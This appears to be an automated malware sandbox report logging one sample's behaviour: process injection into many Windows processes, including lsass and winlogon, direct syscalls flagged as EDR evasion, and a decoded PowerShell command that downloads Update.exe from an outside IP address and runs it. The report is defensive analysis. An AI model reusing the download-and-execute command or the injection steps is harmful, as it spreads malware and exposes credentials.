            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC670000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAEEB0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1845B370000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2108BCF0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29166940000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 3020000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E949510000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 242F9650000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 28946B90000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 264105C0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20FC8E50000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A115080000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E89E6C0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Local\Temp\Update.exe base: 1FA89340000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Local\Temp\Update.exe base: 1F142960000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Local\Temp\Update.exe base: 1BD01450000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Local\Temp\Update.exe base: 20601B20000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe base: 29F03070000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe base: 18C15EF0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1FAC8F40000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1E2DD3B0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28D0DB10000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 203707E0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\schtasks.exe base: 1EB0EAA0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 24BAA650000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Google\Chrome\updater.exe base: 26DFBD60000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Google\Chrome\updater.exe base: 26DFBD90000 protect: page execute and read and write
            Contains functionality to inject code into remote processes
            Source: C:\Windows\System32\dialer.exeCode function: 54_2_00007FF7FB4C1DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,54_2_00007FF7FB4C1DB4
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC672908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C0AB2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 612D2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AEEB2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 87992908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53772908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D532908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 67D2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5B372908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EBFD2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 59042908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9E72908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 73162908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4E862908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 473C2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6F9D2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 83BC2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D3F72908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A4152908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BDF32908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C0262908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C9F32908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 645B2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B2A2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4F62908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2AB42908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ADB2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1992908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25DA2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F5352908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F0D62908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FFB2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C2572908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8BCF2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66942908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13EF2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D572908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 69B42908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC742908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5DA72908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199D2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F3892908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3B82908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E42908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A6532908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 27BC2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B152908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 621A2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F482908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B4B2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683D2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3022908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2E262908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6C5E2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D5932908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC652908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 777C2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B42908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB4C2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2A642908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CF32908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 49352908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E7B2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F7C2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E8152908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 52342908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DA92908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 49512908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F9652908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 46B92908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 105C2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C8E52908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 15082908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9E6C2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 89342908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 42962908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1452908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1B22908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3072908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 15EF2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C8F42908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DD3B2908
            Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EIP: DB12908
            Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\conhost.exe EIP: 707E2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EAA2908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AA652908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FBD62908
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FBD92908
            Encrypted powershell cmdline option found
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: Base64 decoded (New-Object System.Net.WebClient).DownloadFile('http://51.77.140.74/pages/Update.exe', <#mht#> (Join-Path <#dvg#> -Path $env:Temp <#zrb#> -ChildPath 'Update.exe'))<#beq#>; Start-Process -FilePath <#yjf#> (Join-Path -Path $env:Temp <#dln#> -ChildPath 'Update.exe')<#kcn#>
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: Base64 decoded (New-Object System.Net.WebClient).DownloadFile('http://51.77.140.74/pages/Update.exe', <#mht#> (Join-Path <#dvg#> -Path $env:Temp <#zrb#> -ChildPath 'Update.exe'))<#beq#>; Start-Process -FilePath <#yjf#> (Join-Path -Path $env:Temp <#dln#> -ChildPath 'Update.exe')<#kcn#>
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: Base64 decoded (New-Object System.Net.WebClient).DownloadFile('http://51.77.140.74/pages/Update.exe', <#mht#> (Join-Path <#dvg#> -Path $env:Temp <#zrb#> -ChildPath 'Update.exe'))<#beq#>; Start-Process -FilePath <#yjf#> (Join-Path -Path $env:Temp <#dln#> -ChildPath 'Update.exe')<#kcn#>Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess created: Base64 decoded (New-Object System.Net.WebClient).DownloadFile('http://51.77.140.74/pages/Update.exe', <#mht#> (Join-Path <#dvg#> -Path $env:Temp <#zrb#> -ChildPath 'Update.exe'))<#beq#>; Start-Process -FilePath <#yjf#> (Join-Path -Path $env:Temp <#dln#> -ChildPath 'Update.exe')<#kcn#>
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeNtQuerySystemInformation: Direct from: 0x7FF70081795E
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeNtQuerySystemInformation: Direct from: 0x7FF64137795E
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifMemory written: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe base: 5B0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifMemory written: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe base: 3A0000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEEB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B370000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166940000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 3020000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
